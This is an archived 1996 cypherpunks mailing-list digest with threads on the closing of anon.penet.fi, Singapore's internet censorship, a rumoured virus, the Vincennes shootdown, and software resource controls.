2209608 or 2426453 or 2224058 A4/204 Ekta Vihar, 9 Indraprastha Extn, New Delhi 110092 INDIA From ichudov at algebra.com Sun Sep 1 17:11:15 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 08:11:15 +0800 Subject: It is good that anon.penet.fi has been closed! In-Reply-To: Message-ID: <199609012217.RAA00801@manifold.algebra.com> Mark M. wrote: > On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > > Yes, subject says it all. anon.penet.fi was a whole lot worse than > > cypherpunks remailers. It provided clueless users with no real security, > > It also provided anonymity to many people who needed it. I think that many > people who need anonymity will probably just learn faking mail and news > headers. Many people just don't want to deal with cpunk remailers. OTOH, I > agree that this might actually force many people with Penet addresses to learn > about more secure remailers. In this way, the closing of anon.penet.fi could > be looked upon as a Good Thing. However, as long as there is no easy way for > Windoze and Mac users to use secure remailers, users will sooner resort to > fake-mailing then learning how to use cpunk remailers. People that need a > pseudonym address to use on various support groups can get them from other, > equally insecure, remailers. I believe that Private Idaho is a cypherpunks remailer client for Windows. - Igor. From jseng at pobox.org.sg Sun Sep 1 18:21:59 1996 From: jseng at pobox.org.sg (James Seng) Date: Mon, 2 Sep 1996 09:21:59 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: On Sat, 31 Aug 1996, Timothy C. May wrote: > The point is to make clear to them that the Usenet and similar Web sites > are global in nature, not subject to censorship without a very high local > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then > Singaporans will have to choose not to carry the various newsgroups into > which *I* post such messages! Just let to add my comment in regard to this unforuntate discusssion. To understand the sitution better, you should not impose America idealogy and perspection on how things to be done to Singapore. Singapore maybe young but there are certain culture too. Most importantly, the move to censor certain WWW site actually comes as a relieve to many people, especially parents who worried about the bad influence of it. We can go into the same discussion about whose responsibilty it is but before you do that, please bear in mind that this is Singapore. As an example of what i mean, few years back, when they introduced R rating movies uncensored in Singapore for people above 18, it cause a surge in soft-porn movie to be screened. There is a general dissatifaction among the people and the government was force to shift the age limit to 21. And then later revised the R rating to R(A), where A stands for artistic which rules out soft-porn. It may be surprising but many people (in Singapore) do welcome censorship sad to say. In addition, you need to see the method of censorship deployed in Singapore. For press media like papers and magazine, it is done in a passive manner. They _do not_ read every issue of every magazine available in Singapore. They only do so when there is enough complains. For example, the incident of "Wired" banning due to the article "Disney with a Death Penalty" was prompted by complains by the public before action is done. (This is related to me by some frens of mine working in the ministry who is directly involved in the incident). Similarly, they are deploying the same method to WWW. One more point. They know it is impossible to censor everything. It is possible for me to order Wired directly from US. But still they do it. To quote, "We are doing it for the sake of doing it. The intention is to make it difficult to access to such information although we know it is impossible to prevent all." (I may missed some words but the idea is that). I have a long argument with this person, telling him that despite what they have done, i could still access to those stuff which they ban. his reasoning is "how many people can do it? 10%? 5%? That's fine with us. If the people really wans it, they can get it". In actual fact, the move to put all people on proxy was not a surprise to many of us. The first time i know of such an intention was in Aug 95, which is one year back. They _have_ been doing studies and testing since then. The ISPs have been well informed and have been doing their own testing too since then. I am writting this based on an experience in Singapore for more than 12 yrs (Yes, i am not a Singaporean). if you wish to rebuke the points which i mention above, please feel free to do so but do so in the context wrt Singapore culture. Do not impose the general idealogy and culture within your country into your argument. (Oh yea, dont give me the "Bull shit! This fren of mine so-and-so have said that ....". We talking about general idealogy of the people, not of a single person) Lastly, do _not_ misunderstood that i support the censorship. I never do and never will. Nor do i really feels that what they doing are right. There are some people like me who disapproved the moves but the voice is really too small to make a difference...yet. > To be blunt, if Singapore wants to stop me from discussing the dictator Yew > and his feeble son, they can't. Except by pulling the plugs on forums in > which my posts are carried. I consider this a Good Thing (that politicians > in Country A generally have no power to tell citizen-units in Country B > what they can say and what they can't). Now, what makes you think that citizen of Country A has the power or rights to tell politicians of Country B what to do and what they cannot do? Just wondering. ps: Sorry for the off-topic discussion. -James Seng From charlee at netnet.net Sun Sep 1 18:22:43 1996 From: charlee at netnet.net (kickboxer) Date: Mon, 2 Sep 1996 09:22:43 +0800 Subject: HAZ-MAT virus Message-ID: <199609012319.SAA18515@netnet1.netnet.net> I do not know how it is run by the JPG and GIF files, but I do know that the code somehow loads into the image viewer itself..I am not sure how it works, just that it is very destructive.. I had it destroy my 486 (using Lview Pro) Oh, well, ENOUGH already. if you have something to say that is related to "image files cant execute a virus" please do not. there are too many spams with those ideas out now From patrickbc at juno.com Sun Sep 1 18:22:46 1996 From: patrickbc at juno.com (patrick b cummings) Date: Mon, 2 Sep 1996 09:22:46 +0800 Subject: No Subject Message-ID: <19960831.181353.9134.9.patrickbc@juno.com> need more hackers for the list please send following info to me handle e-mail address P.O. Box url type of hacking you do From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 1 18:22:48 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Mon, 2 Sep 1996 09:22:48 +0800 Subject: "Security risks" vs. "credit risks" Message-ID: <01I8Z52F4F5S9JDHU2@mbcl.rutgers.edu> According to the WaP article, the database in question would be _required_ by the federal government... thus removing any voluntary aspect of it, so long as you want to fly on a plane. I have had the thought that it might be possible for an air cargo business to have as a stock benefit a guarantee that, for payment of any extra costs, any stockholder could ride on one of their planes. I don't know how the laws on the subject are worded, but I believe that a lot of restrictions are removed for planes other than standard passenger airlines. This might be a way to fly anonymously - Chaumian "is-a-stockholder" credidentials might be usable to arrange it (the local library's copy of Applied Cryptography is checked out, so I don't know for sure) anonymously. -Allen From dlv at bwalk.dm.com Sun Sep 1 18:29:30 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 2 Sep 1996 09:29:30 +0800 Subject: Sen. Leahy's "impeccable cyberspace credentials" In-Reply-To: <19960830.170609.9758.0.patrickbc@juno.com> Message-ID: patrickbc at juno.com (patrick b cummings) writes: > jimbell, > I agree with what you are saying but not all polititions are that bad. > You make it sound as if their are no politisions are for freedom of the > net. But of course - all politicians are scum. No decent person would want to be a politician. Anyone who's willing to become a politician is scum. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From MAILER-DAEMON at mqg-smtp3.usmc.mil Sun Sep 1 19:02:16 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Mon, 2 Sep 1996 10:02:16 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: It is good that anon.penet.fi has been closed! Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages. UNDEFINED-----BEGIN PGP SIGNED MESSAGE----- On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > Yes, subject says it all. anon.penet.fi was a whole lot worse than > cypherpunks remailers. It provided clueless users with no real security, > because it stored return addresses and did not use chaining and > encryption. It also provided anonymity to many people who needed it. I think that many people who need anonymity will probably just learn faking mail and news headers. Many people just don't want to deal with cpunk remailers. OTOH, I agree that this might actually force many people with Penet addresses to learn about more secure remailers. In this way, the closing of anon.penet.fi could be looked upon as a Good Thing. However, as long as there is no easy way for Windoze and Mac users to use secure remailers, users will sooner resort to fake-mailing then learning how to use cpunk remailers. People that need a pseudonym address to use on various support groups can get them from other, equally insecure, remailers. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMinwTizIPc7jvyFpAQFpGAf/ZGEXRU7MuROtatlHoAIdaJfIiwig1oDr fwlNjRe7f1ze8dwUuh74nWFt/ofPtjwSUtpCa1xDgTptPPhzr1I6beOdjwONlUzf MVif+wnzyIp27V/DCjebAMxQc2avmYKM6mwcOKfzFwG0cfvf/walJrjmADR9K0oe EXqi7mJzY1rI08Dsw8aHXNj8maDy9pRTSz9O9e0qZTdFlQtFyVNM6PSfAnKR9e1L ebQ5Yx4qNkgkfhDZgacKNv2inkyuD1LsyQneiCIZ0obhhRL7ORU63wGgYlvqc3gx Ux8sK2mMo6kr2dvA07nRyLzl3w9vm6efrFJeZC94fjdBYxluFg6/ag== =+Qm6 -----END PGP SIGNATURE----- From jburrell at crl.com Sun Sep 1 19:19:04 1996 From: jburrell at crl.com (Jason Burrell) Date: Mon, 2 Sep 1996 10:19:04 +0800 Subject: anon.penet.fi: URGENT REQUEST Message-ID: <199609020012.UAA12054@spirit.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > ! on a dedicated 28.8 PPP line. The cheapest used VGA display from > ! the nearby waste dump will work just fine. > > Hell, any monitor should work! I'm curious about how to go about > acquiring one of those huge 100+ x 100+ charactor terminals that linux > supports. Is it practical, cheap and readable? If you mean something like a 132x60 character terminal, you can get a utility from Sunsite called SVGATextMode which will do that for you on a standard VGA monitor, provided you have a graphics card which supports such a mode. I have an STB Nitro 2MB ISA card, and am running a 132x60 mode on a 14 inch monitor. > ln -s /dev/null /usr/postmaster > ln -s /dev/null /usr/abuse I think you mean /usr/spool/mail/postmaster, but I could be wrong. ;) > That should filter the mail quite nicely! :-> Indeed. :) - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMiombioZzwIn1bdtAQFDUQF/drCreJbjZxyLz2rMirboSzv77W/dW/9Q k1BMBvpx9+5R39MP+bUHEJQ65UhDskV6 =Eacf -----END PGP SIGNATURE----- From bf578 at scn.org Sun Sep 1 19:27:10 1996 From: bf578 at scn.org (SCN User) Date: Mon, 2 Sep 1996 10:27:10 +0800 Subject: FW: get me off of this list!!!!! Message-ID: <199609020042.RAA12094@scn.org> > >>> wrote: >>>I need to be taken off of this list but I can't remeber the code >>> >>>to desubscribe. Can anyone tell me what the code is? >>>------------------------------------- >> >>What's the frequency Herbert? >> >>Help, I've fallen and I can't remeber the code. >> >>Hint: Try consulting "The Codebreakers." > >I guess he deleted that all important message he got when he > duhscribed. > >it went something like this... >Welcome to the cypherpunks mailing list! > >[...] >If you ever want to remove yourself from this mailing list, > >[...] >(and wanting to get off the list is never an emergency) > >[...] >Do not mail to the whole list asking to be removed. It's rude. > >[...] > -- ------------------------------------------ There are no facts, only interpretations. I always wanted to be somebody, but I should have been more specific. From furballs at netcom.com Sun Sep 1 19:41:29 1996 From: furballs at netcom.com (Paul S. Penrod) Date: Mon, 2 Sep 1996 10:41:29 +0800 Subject: HAZ-MAT virus In-Reply-To: <199609012319.SAA18515@netnet1.netnet.net> Message-ID: First, the HAZ-MAT is a polymorphic virus. It is not run by any data file (GIF, JPG or otherwise). Second. I had a private message sentto me from someone who suffered at the hands of this virus and described the effects. From the description it indicates the use of a possible boot or hidden sector residency with low level ATA-3 command capability to zap IDE drives. This is nothing new, or magical. Third. The HAZ-MAT virus has been documented to have been transported via a rogue copy of EudoraPro in zip format, plus one other EXE (non-image application). This is not spam, just facts... On Sun, 1 Sep 1996, kickboxer wrote: > I do not know how it is run by the JPG and GIF files, but I do know that the > code somehow loads into the image viewer itself..I am not sure how it works, > just that it is very destructive.. I had it destroy my 486 (using Lview Pro) > Oh, well, ENOUGH already. if you have something to say that is related to > "image files cant execute a virus" please do not. there are too many spams > with those ideas out now > > > From patrickbc at juno.com Sun Sep 1 19:42:20 1996 From: patrickbc at juno.com (patrick b cummings) Date: Mon, 2 Sep 1996 10:42:20 +0800 Subject: No Subject Message-ID: <19960831.193316.9134.18.patrickbc@juno.com> what do you know about hackers From angelos at gradin.cis.upenn.edu Sun Sep 1 19:50:32 1996 From: angelos at gradin.cis.upenn.edu (Angelos D. Keromytis) Date: Mon, 2 Sep 1996 10:50:32 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com> Message-ID: <199609020051.UAA14557@gradin.cis.upenn.edu> -----BEGIN PGP SIGNED MESSAGE----- In message <19960901220323595.AAA208 at Esther.edventure.com>, Esther Dyson writes : >Now, speaking personally: I believe there are trade-offs -- which is what I >told the LA Times. I assume I was quoted accurately (although the word >"enforce" is awkward), but out of context. Anonymity can be dangerous -- >as can traceability, especially in/by repressive regimes. Therefore I would >favor allowing anonymity -- with some form of traceability only under terms >considerably stronger than what are generally required for a wiretap. >Anyone who seriously needs anonymity because of a repressive government is >likely to use a foreign (outside whatever jurisdiction he fears) server, so >that this is not a matter of "local" laws. The tracer would have to pass >through what I hope would be tighter hoops than we have now. > Just a small parenthesis at this point: traceability can be dangerous even in non-repressive regimes; there is information about oneself which, although far from illegal or "top secret", is not exactly for the whole world to know; this sort of information includes, but is not limited to, financial transactions, product preferences, habbits, hobbies etc. My feeling is that it's better to devise ways to prevent a digital crime (for lack of better term) than try to find and punish the culprit(s). Of course, this applies to SOME services (i don't expect anonymous contracts to become very popular), for which anonymity makes sense. But the infrastructure has to be there, IMNSHO. Just my $0.02 (+tax). - -Angelos PS. An interesting thing to consider is whether traceability in a service should be inherent to it or enforced by policy. -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCUAwUBMiovkL0pBjh2h1kFAQEt4wP4iBUomLacEjyTkrwme+0OjQnVcd+/Lok0 2l1tnNed/CgvgF5gHRoylWPK42HmmQ6vzWqsdihrTR9YWy/eQIT1W6VHoD/b0pBD aG7pXhy39aAHaMItIS8+3THcWhkcVLVEU/xk8nTyfm325OC7G9O25/EoRu80wr/N mtezdUBRUw== =Z5U4 -----END PGP SIGNATURE----- From drose at AZStarNet.com Sun Sep 1 19:53:03 1996 From: drose at AZStarNet.com (David M. Rose) Date: Mon, 2 Sep 1996 10:53:03 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <199609020056.RAA15989@web.azstarnet.com> Dear Ms. Dyson: As a result of my knowing something of your work and additionally having viewed your highly impressive performance on Bill Buckley's CDA debate program, I used to think a great deal of you. And, as a matter of fact, I suppose that I still do. I am frankly troubled, however, by my _impression_ of your beliefs in the abovereferenced matter. Perhaps I have misunderstood your recent post to Cypherpunks; indeed, I am certain that all will be elucidated after you have had an opportunity to review more fully the article in question. I look forward to reading your further thoughts. Sincerely, -David M. Rose From alanh at infi.net Sun Sep 1 20:01:31 1996 From: alanh at infi.net (Alan Horowitz) Date: Mon, 2 Sep 1996 11:01:31 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) In-Reply-To: <199609011605.MAA26536@gradin.cis.upenn.edu> Message-ID: The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. If my memory serves, the Iranian jetliner had its squawker turned off, or broken. The officer in charge in the CIC had about ten seconds to decide if he was about to be locked-on by a missle. And no real information to make the decision with. From tcmay at got.net Sun Sep 1 20:09:30 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 11:09:30 +0800 Subject: PLEASE Nuke Singapore Back into the Stone Age Message-ID: At 11:06 PM 9/1/96, James Seng wrote: >To understand the sitution better, you should not impose America >idealogy and perspection on how things to be done to Singapore. Singapore >maybe young but there are certain culture too. Who says this has anything to do with "American ideology"? The Usenet is propagated around the world. All we are saying is that honest commentary on the corruption of Lee Kwan Yew (and his billion dollars in Australian and European banks) will be reported on the Usenet. This is not "imposing American ideology" on anyone. Singapore, being the dynastic dictatorship that it is, may decide to block access all newsgroups which discuss Yew's tyranny, or pornography, or pro-Malay sentiment, or anything else banned in the Benevolent Republic of Singapore. This will be their choice, to ban access by citizen-units to Evil Thoughts. It is not an issue of "imposing American ideology" on the helpless in Singapore, any more than a book or magazine is "imposing" an ideology. It sounds to me, James, that you need to get out of Singapore and visit a country where free speech and free ability to read material is not treated as "imposed foreign ideologies." (I think you also need to look up what "imposed" means. The "Wired" magazine banned in Singapore is not something that is ever "imposed" on others....anyone is free to simply not read the magazine!) >is Singapore. As an example of what i mean, few years back, when they >introduced R rating movies uncensored in Singapore for people above 18, >it cause a surge in soft-porn movie to be screened. There is a general So? Your point being? After all, nobody is forcing _you_ to go watch these R-rated movies. You are free to not watch if you find them offensive. In a free society this is how things work. I think you'll find this mailing list anathema to your apparent ideology. ... >Singapore culture. Do not impose the general idealogy and culture within >your country into your argument. (Oh yea, dont give me the "Bull shit! ... >Now, what makes you think that citizen of Country A has the power or >rights to tell politicians of Country B what to do and what they cannot do? >Just wondering. Again, you really need to look up the meaning of "impose" more carefully. By posting a comment about how Singapore sucks, or how Lee Kwan Yew raped his country and deposited his profits in Australian and European banks, just what am I "imposing" on Singaporans or anyone else? I think you have little understanding of how the global Internet works. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From minow at apple.com Sun Sep 1 20:11:50 1996 From: minow at apple.com (Martin Minow) Date: Mon, 2 Sep 1996 11:11:50 +0800 Subject: Desubscribe In-Reply-To: <199609011607.JAA22532@dns1.noc.best.net> Message-ID: "James A. Donald" , writes: >I heard on talk.politics.guns somebody say that in Sweden they >had banned knives with a sharp point at the end, and were going >to ban sharp knives altogether. I think he was just engaging in >hyperbole, that he really meant that gun control in Sweden was >unreasonably strict, but on reflection I am not sure. > In a survey conducted in Sweden a few years ago, 50% of Swedish households had access to guns (generally military service weapons and sporting shotguns). Guns are, however, licensed and regulated, and seldom used in crimes. Licenses for "personal protection" are almost unobtainable. At least one military officer was court martialed when his service revolver was stolen from his automobile. The most significant "mass murderer" crimes in Sweden (one last year and one in the 1970's) were caused by people who used their legally-obtained military weapons. Martin Minow (ex-resident of Sweden) minow at apple.com From patrickbc at juno.com Sun Sep 1 20:22:30 1996 From: patrickbc at juno.com (patrick b cummings) Date: Mon, 2 Sep 1996 11:22:30 +0800 Subject: No Subject Message-ID: <19960831.201554.9134.24.patrickbc@juno.com> Please send me information on hacking bbs Hackmaster-p Patrickbc at juno.com From ichudov at algebra.com Sun Sep 1 20:24:03 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 11:24:03 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: <199609020116.UAA01684@manifold.algebra.com> James Seng wrote: > > On Sat, 31 Aug 1996, Timothy C. May wrote: > > The point is to make clear to them that the Usenet and similar Web sites > > are global in nature, not subject to censorship without a very high local > > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then > > Singaporans will have to choose not to carry the various newsgroups into > > which *I* post such messages! > > Just let to add my comment in regard to this unforuntate discusssion. > > To understand the sitution better, you should not impose America > idealogy and perspection on how things to be done to Singapore. Singapore > maybe young but there are certain culture too. > > Most importantly, the move to censor certain WWW site actually comes as a > relieve to many people, especially parents who worried about the bad > influence of it. We can go into the same discussion about whose > responsibilty it is but before you do that, please bear in mind that this > is Singapore. America is much less different from Singapore in that respect than you might think. igor From angelos at gradin.cis.upenn.edu Sun Sep 1 20:25:38 1996 From: angelos at gradin.cis.upenn.edu (Angelos D. Keromytis) Date: Mon, 2 Sep 1996 11:25:38 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) In-Reply-To: Message-ID: <199609020111.VAA15203@gradin.cis.upenn.edu> -----BEGIN PGP SIGNED MESSAGE----- In message , Alan Horow itz writes: >The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. > >If my memory serves, the Iranian jetliner had its squawker turned off, or >broken. The officer in charge in the CIC had about ten seconds to decide >if he was about to be locked-on by a missle. And no real information to >make the decision with. There's still the possibility that something malfunctioned (but not fatal - otherwise - for the plane). I'm not saying it's what happened, but it's a distant possibility. - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBMio0Kr0pBjh2h1kFAQEHHgQAnRl8UhCE+VMQc522VK5wM1onihgI0TMg 6O5tE+b7VRjuT71X8NabxTcoHqs2bePmTbcof62lAJfS61cZNfCuiEO+Pl7Xg/pg bqcLtwB8BJqAIluFt9s5kAXK2MxHJrZYDKc1ORkH0C4BqkRuYN09zNYuZ1+YegH6 TfYXEnNKC9s= =BjDI -----END PGP SIGNATURE----- From adam at homeport.org Sun Sep 1 20:35:19 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 2 Sep 1996 11:35:19 +0800 Subject: Conservation Laws, Money, Engines, and Ontology In-Reply-To: Message-ID: <199609020218.VAA25795@homeport.org> Tim raises some interesting points, I'd like to focus in on one small section, that of controlling what software runs on a machine. I have no issue with a user choosing the software that runs, but lets consider the Microsoft CAPI model. In it, there is control over what runs, but it exists at the vendor level. This is moving away from the personal computer, and back to the timeshare model, where control over what you run is partially in the hands of the vendor. Giving up this control of your computer is a step in a dangerous direction. However, creating 'execution kernels' with cryptographic authentication and resource controls is something that would be very useful in a number of places. Tim's selling of CPU cycles, stamps and the like dovetails with something I wrote last December (www.homeport.org/~adam/java.html) on the need for granular controls in Java execution. So, I'm in agreement that we need resource allocation controls, and I want to stress the need for those controls to be configured by the owner of the computer, not the author of an operating system, or by government policies. When they buy me a computer, they can decide what runs on it. Adam Timothy C. May wrote: | Now, certainly I support the right of any person or machine to run programs | freely and without charge, to pass on e-mail free of charge, to run | remailers for no charge, to accept spam mail without complaint, and so on. | | What I'm suggesting is that many of the problems being seen with overuse of | resources, spam, congestion, and denial of service are really due to a poor | model of resource allocation. Unix and other modern operating systems offer | various tools for helping to constrain such problems, but, I submit, better | methods are needed. -- "It is seldom that liberty of any kind is lost all at once." -Hume From ses at tipper.oit.unc.edu Sun Sep 1 21:45:14 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 2 Sep 1996 12:45:14 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) In-Reply-To: Message-ID: On Sun, 1 Sep 1996, Alan Horowitz wrote: > The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. > > If my memory serves, the Iranian jetliner had its squawker turned off, or > broken. The officer in charge in the CIC had about ten seconds to decide > if he was about to be locked-on by a missle. And no real information to I think it was actually a combination of a design flaw in the user interface for the control system combined with a human error that led to the radar officer confusing the airbus with an (F4?) a hundred miles away that he'd previously clicked on. ----- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From amehta at giasdl01.vsnl.net.in Sun Sep 1 21:48:55 1996 From: amehta at giasdl01.vsnl.net.in (Arun Mehta) Date: Mon, 2 Sep 1996 12:48:55 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age Message-ID: <1.5.4.32.19960902014136.002fc4b4@giasdl01.vsnl.net.in> At 10:35 31/08/96 -0700, Timothy C. May wrote: > If discussions of Lee Kwan Yew's dynasty are considered illegal, then >Singaporans will have to choose not to carry the various newsgroups into >which *I* post such messages! How long do you propose to carry on doing that? Soon, the others in the newsgroups will be asking you very impolitely to stop, just as you would if someone kept on and on posting such stuff to cypherpunks. >At 6:35 AM 8/31/96, Arun Mehta wrote: >>Then again, inappropriate postings are the bane of the Internet: the consensus >>on which the Net functions relies heavily on people not posting >>inappropriately. >This works imperfectly, as all long-time surfers of the Usenet will attest! True, but Usenet only functions because it works most of the time. To the extent we subvert this consensus, we damage Usenet, make it less useful. It shouldn't happen that in trying to save or spread Usenet, we have to destroy it... >And _never_ has it involved determinations of "inappropriate" by >_governments_! There I'm with you -- I'm merely suggesting that you find a way to protest Singapore's actions in a manner that would be less objectionable to most Internet users, in Singapore and outside. >The point of being sometimes "impolite" (*) is to "force their hand." I never said anything about politeness -- the appropriateness I was talking about was in the context of what the people posting to a discussion group consider proper material for them to receive, not what the government of Singapore thinks. In any case, I think we may be slightly going off track as far as the current Singapore problem is concerned. They are blocking access to certain web sites from mid September -- Usenet isn't part of the current discussion, far as I know. Arun Mehta Phone +91-11-6841172, 6849103 amehta at cpsr.org http://www.cerfnet.com/~amehta/ finger amehta at cerfnet.com for public key From tcmay at got.net Sun Sep 1 22:23:28 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 13:23:28 +0800 Subject: American Imperialism, Firing Squads, and the Vincennes Shootdown Message-ID: At 1:03 AM 9/2/96, Alan Horowitz wrote: >The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. > >If my memory serves, the Iranian jetliner had its squawker turned off, or >broken. The officer in charge in the CIC had about ten seconds to decide >if he was about to be locked-on by a missle. And no real information to >make the decision with. The U.S.S. Vincennes shot down an Iranian commercial airliner that was in its normal and well-known flight path out of Bandar Abbas. That the U.S. felt it was in a "war zone" was due to American imperialistic sentiments that say the U.S. can and should send its police forces to distant parts of the globe, even inside the Persian Gulf, no more than a few dozen miles from Iranian shores. (And the godless Jew Persians had the audacity to patrol its shorelines with gunboats! Jeesh. I'm sure the U.S. would not send the Coast Guard out to investigate or harass foreign warships cruising inside Chesapeake Bay, San Francisco Bay, or other coastal bays and inlets.) As to the "squawker" being turned off, this is not my recollection of the case (though it was nearly a decade ago, so memories fade...). (I just did an Alta Vista search to refresh my memory. Found this choice description: " Anderson's job in "Air Alley," the row of operators who handled air warfare, was to identify any air traffic within range of the ship. He told the Aegis system to query the incoming plane: Identify, Friend or Foe? By standard practice, all planes carry a transponder that automatically answers the IFF query with Mode 1 or 2 (military), or Mode 3 (civilian). Anderson got a Mode 3. "Commair" (commercial airliner), he figured. He reached beside his console for the navy's listing of commercial flights over the gulf. But as he scanned the schedule, he missed Flight 655. Apparently, in the darkness of the CIC, its arc lights flickering every time the Vincennes's five-inch gun fired off another round at the hapless Iranian gunboats, he was confused by the gulf's four different time zones." [http://www.waite.adelaide.edu.au/~aranjbar/Ali/pol/4] So, the Iranian jet's IFF module _was_ working...the U.S. ship just missed it. Fact is, the U.S. shot down a commercial airliner which was in its normal flight path! One can imagine the repercussions if TWA 800 was similarly shot down as it followed its ordinary flight path. The U.S. demanded sanctions against the Soviets in '83 for shooting down a Korean airliner which had strayed (maybe) deep into Soviet airspace and which refused to acknowledge several radio messages. Though I am no apologist for the Soviets, which event was the more egregious? That the U.S. demanded actions against the Sovs, but pooh-poohed and whitewashed the Iranian airliner shootdown, is evidence of imperialistic hypocrisy. That the U.S. demands trials for alleged terrorists while having no trial for Captain Rogers is further evidence of hypocrisy. (A military court martial and a firing squad for those found guilty might have sent a more consistent message.) Make no mistake about it: I cannot support the sending of American gunboats to the backyards of other countries merely for perceived notions about American rights to their oil. Hopefully, as crypto anarchy spreads, imperialism such as this will be undermined, destabilized, and ultimately be defeated. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From markm at voicenet.com Sun Sep 1 22:32:32 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 13:32:32 +0800 Subject: It is good that anon.penet.fi has been closed! In-Reply-To: <199609012217.RAA00801@manifold.algebra.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > I believe that Private Idaho is a cypherpunks remailer client for Windows. True. But it is a seperate program from email clients which means that anyone wanting to use Private Idaho has to download it, install it, and learn how to use it in conjunction with one's email program. Most people who may have a need for anonymity have probably never heard of PGP or Private Idaho. I think that until remailer functions are actually built into the programs that people use, remailer use will be rare. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMipNqizIPc7jvyFpAQFy0Qf+LbMgy3PBJ+ipGbxblKbjEm09aiziLEpD p7JCudf6TrBUdF+2PwTdxK/sOCITE9lTwbycAgeCvEYNUJEbsR3a6ix5fxbQuF8p Y9/tEbLVESUz0/+UthVnBasbFsCOzHV+ztlIRIk8SEEJKxsu8cNRZqcjaAqH5Q1A dmBKZ9KGQWPNuc5oLfqahyzroa8kAG59HSDm+ntV9fwduKNi8wSV6WFmA2s9pnZa +yRRXmSm4PkWVXgNdQCosTTcD1enSIBcH2WAQu1jpDZbbs6+6v1KvdPa5+WOvTs3 kpBfFBlsmVkWJS63ouqDb7yihoq/qZvhyE2Fske8uVYh9M5Ffn9AKg== =md6D -----END PGP SIGNATURE----- From frogfarm at yakko.cs.wmich.edu Sun Sep 1 22:36:10 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Mon, 2 Sep 1996 13:36:10 +0800 Subject: It is good that anon.penet.fi has been closed! In-Reply-To: Message-ID: <199609020313.XAA04501@yakko.cs.wmich.edu> > headers. Many people just don't want to deal with cpunk remailers. OTOH, I > agree that this might actually force many people with Penet addresses to learn > about more secure remailers. In this way, the closing of anon.penet.fi could > be looked upon as a Good Thing. However, as long as there is no easy way for > Windoze and Mac users to use secure remailers, users will sooner resort to > fake-mailing then learning how to use cpunk remailers. People that need a > 